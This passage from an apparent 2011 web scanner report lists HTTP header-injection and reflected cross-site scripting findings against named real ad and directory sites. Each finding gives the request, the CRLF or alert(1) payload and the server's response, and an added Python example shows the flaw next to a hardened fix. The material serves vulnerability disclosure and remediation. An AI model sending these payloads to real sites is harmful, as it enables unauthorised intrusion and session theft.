User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:41 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk902110218044741375ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPTgwODdiDQpiYTY0YjViZDZlOSZDTEs9Mzk0MTEwMjE4MDQ0NzE5ODA4JiZleHA9eQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=902110218044741375&&CCID=20123519203630910&QTR=8087b
ba64b5bd6e9
&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 536

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.28. http://o1.qnsr.com/cgi/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 73f58%0d%0abdb12e368f6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58%0d%0abdb12e368f6=1 HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:11 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk306110218044811267ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=306110218044811267&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58
bdb12e368f6
=1&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 601

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...
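
The findings in this section all share one mechanism: a value the server percent-decodes (a query parameter, a parameter name, a path segment, or in 2.29 a cookie) is concatenated into a response header, and the decoded %0d%0a ends that header early. The example below is added here and is not code from the scanner report or from any of the sites it names. It models a reflecting redirector of the kind shown above, applies the same check the report applies (the text after the CR LF must start a header line of its own), and shows the hardened emitter that rejects control characters and re-encodes the redirect target. The host name forms.example.invalid, the parameter names and the marker strings are constructed for the example.

```python
"""
Added example, not code from the scanner report or from the sites it names.
Models a reflecting redirector, reproduces the report's CR LF check, and
shows the hardened form of the header emitter. All names are constructed.
"""
from typing import List, Optional
from urllib.parse import quote, unquote

CRLF = "\r\n"
TARGET = "http://forms.example.invalid/controller"   # constructed redirect base


class HeaderInjection(ValueError):
    """Raised by the hardened emitter when a value would split a header."""


def raw_header(name: str, value: str) -> str:
    """The vulnerable pattern: untrusted text concatenated into a header.
    Nothing stops a decoded CR LF from ending the field early."""
    return f"{name}: {value}"


def checked_header(name: str, value: str) -> str:
    """Hardened emitter. RFC 7230 allows no CR, LF or other control
    characters in a field value, so refuse them rather than guess what a
    client or proxy will do with them. Used for Location and Set-Cookie
    alike, which covers the cookie reflection in finding 2.29 as well."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise HeaderInjection(f"control character in {name} value")
    return f"{name}: {value}"


def vulnerable_redirect(query: str) -> bytes:
    """Models the reflecting endpoints in the report: percent-decode the
    query (so %0d%0a becomes a real CR LF) and copy it into Location."""
    lines = [
        "HTTP/1.1 302 Found",
        raw_header("Location", f"{TARGET}?{unquote(query)}"),
        raw_header("Content-Type", "text/html; charset=iso-8859-1"),
    ]
    return (CRLF.join(lines) + CRLF + CRLF).encode("latin-1")


def hardened_redirect(query: str) -> bytes:
    """Same endpoint with the fix: validate the decoded value, then
    re-encode it so the header is one line whatever was supplied."""
    decoded = unquote(query)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        raise HeaderInjection("control character in redirect parameter")
    # quote() re-encodes '%' too, so a double-encoded %250d%250a cannot
    # turn into a bare CR LF if something downstream decodes it again.
    encoded = quote(decoded, safe="/?&=;:,+@")
    lines = [
        "HTTP/1.1 302 Found",
        checked_header("Location", f"{TARGET}?{encoded}"),   # second gate
        checked_header("Content-Type", "text/html; charset=iso-8859-1"),
    ]
    return (CRLF.join(lines) + CRLF + CRLF).encode("latin-1")


def header_lines(raw: bytes) -> List[str]:
    """Split a response the way a client does: the header block ends at the
    first empty line, and every CR LF inside it starts a new field."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    return head.decode("latin-1").split(CRLF)


def injected_line(raw: bytes, marker: str) -> Optional[str]:
    """The report's check: the text after %0d%0a in the payload must begin a
    header line of its own, which only happens if the CR LF survived."""
    for line in header_lines(raw)[1:]:
        if line.startswith(marker):
            return line
    return None


# Payload shape used throughout the report: <prefix>%0d%0a<marker>. A real
# attack would put a header, or an empty line plus a body, after the CR LF;
# the scanner uses an inert random marker so the split is visible but harmless.
PAYLOAD_QUERY = "srvid=67110&spage=ac9b5%0d%0a7aa82c9df45&ff="


def demo() -> dict:
    """Runs the vulnerable and hardened handlers against the same payloads."""
    vuln = vulnerable_redirect(PAYLOAD_QUERY)
    try:
        hardened_redirect(PAYLOAD_QUERY)
        hardened_status = "accepted"
    except HeaderInjection:
        hardened_status = "rejected"
    # Double-encoded variant decodes once to a literal '%0d%0a', which is
    # printable, so the hardened handler accepts it but keeps it on one line.
    double = hardened_redirect("spage=ac9b5%250d%250a7aa82c9df45")
    return {
        "vulnerable_split": injected_line(vuln, "7aa82c9df45"),
        "vulnerable_header_count": len(header_lines(vuln)),
        "hardened": hardened_status,
        "double_encoded_split": injected_line(double, "7aa82c9df45"),
        "double_encoded_location": header_lines(double)[1],
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val!r}")
```

The vulnerable handler emits the marker as its own header line, exactly as the Location headers above do; the hardened handler refuses the decoded payload and keeps a double-encoded variant on a single line. Two caveats a practitioner would attach to the "High" severity the scanner assigns: the real-world impact of a split Location header depends on what sits between the server and the victim (a caching proxy that honours an injected Cache-Control or a forged second response is the serious case, while current browsers tend to drop or refuse such redirects), and the fix has to be applied at the point where headers are written, since the findings above show names, values, path segments and cookies all reaching the same sink.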

2.29. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 8adf5%0d%0ab18ee1d46fb was submitted in the N cookie. This caused a response containing an injected HTTP header. Because the injection point is a cookie rather than a URL parameter, an attacker must first be able to set the N cookie in the victim's browser (for example through another issue on a host that can set cookies for the domain) before this can be turned against that victim, so practical exploitability is lower than for the URL-based findings above; the sink, however, is the same unvalidated header write.

Request

GET /rtx/r.js?cmd=DWT&si=18139&pi=L&xs=1&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=72895 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1298638034; Tsid=0^1298033234^1298035034|18139^1298033234^1298035034; TData=99999|^|#|53615; Anxd=x; N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5%0d%0ab18ee1d46fb; ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:51:11 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 18 Feb 2011 13:06:11 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Mon, 13-Feb-12 12:51:11 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1298638271; path=/; expires=Fri, 25-Feb-11 12:51:11 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298033234^1298035271|18139^1298033234^1298035271; path=/; expires=Fri, 18-Feb-11 13:21:11 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5
b18ee1d46fb
,4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 110
Content-Type: application/x-javascript
Content-Length: 110

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|#|53615';
ANRTXR();


2.30. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 15802%0d%0a6fe09aee5f0 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DWT&si=15802%0d%0a6fe09aee5f0&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=4708&tid= HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 18 Feb 2011 13:02:47 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FqajBjYzJqbWc=; path=/; expires=Mon, 13-Feb-12 12:47:47 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1298638067; path=/; expires=Fri, 25-Feb-11 12:47:47 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298033267^1298035067|15802
6fe09aee5f0
^1298033267^1298035067; path=/; expires=Fri, 18-Feb-11 13:17:47 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 110
Content-Type: application/x-javascript
Content-Length: 110

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqjj0cc2jmg';
var ANSL='99999|^|#|53615';
ANRTXR();


2.31. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f509c%0d%0a6dde35ca4e3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=/HTML/5/2349355./f509c%0d%0a6dde35ca4e3html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:49:45 GMT
Server: Apache
Location: /HTML/5/2349355./f509c
6dde35ca4e3
html
Content-Type: text/html
Content-Length: 0


2.32. http://www.thelist.com/pppclicks.php [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The value of the target request parameter is copied into the Location response header. The payload d7130%0d%0acc710b14b5f was submitted in the target parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=d7130%0d%0acc710b14b5f HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:05 GMT
Server: Apache
Location: d7130
cc710b14b5f

Content-Type: text/html
Content-Length: 0


3. Cross-site scripting (reflected)

There are 143 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://aserve.directorym.com/ModuleG.aspx [dm_affiliate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_affiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5948'%3balert(1)//81e894ba1c7 was submitted in the dm_affiliate parameter. This input was echoed as e5948';alert(1)//81e894ba1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448e5948'%3balert(1)//81e894ba1c7&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:09 GMT
Connection: close
Content-Length: 70772


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://www.directorym.net/s.aspx?s=affiliate448e5948';alert(1)//81e894ba1c7&a=448e5948';alert(1)//81e894ba1c7'
var CId = 0;
var RId = '';
var CIdDefault = 0;
var RIdDefault = '';
var CL = new Array();
var RL = new Array();
RL[0] = new Option
...[SNIP]...

3.2. http://aserve.directorym.com/ModuleG.aspx [dm_link_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_link_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49631'-alert(1)-'9e2f0599833 was submitted in the dm_link_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url=49631'-alert(1)-'9e2f0599833 HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:15 GMT
Connection: close
Content-Length: 70741


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://49631'-alert(1)-'9e2f0599833.directorym.net/s.aspx?s=affiliate448&a=448'
var CId = 0;
var RId = '';
var CIdDefault = 0;
var RIdDefault = '';
var CL = new Array();
var RL = new Array();
RL[0] = n
...[SNIP]...

3.3. http://aserve.directorym.com/ModuleG.aspx [dm_set_regionlist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_set_regionlist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5fad'%3balert(1)//9e3059aac77 was submitted in the dm_set_regionlist parameter. This input was echoed as f5fad';alert(1)//9e3059aac77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=f5fad'%3balert(1)//9e3059aac77&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:12 GMT
Connection: close
Content-Length: 5690


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://www.directorym.net/s.aspx?s=affiliate448&a=448'
var CId = 0;
var RId = 'f5fad';alert(1)//9e3059aac77';
var CIdDefault = 0;
var RIdDefault = 'f5fad';alert(1)//9e3059aac77';
var CL = new Array();
var RL = new Array();
RL[0] = new Option("NY - Liverpool", "LER");
RL[1] = new Op
...[SNIP]...

3.4. http://flash.quantserve.com/quant.swf [lc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 915d3<a%20b%3dc>bf11e275031 was submitted in the lc parameter. This input was echoed as 915d3<a b=c>bf11e275031 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

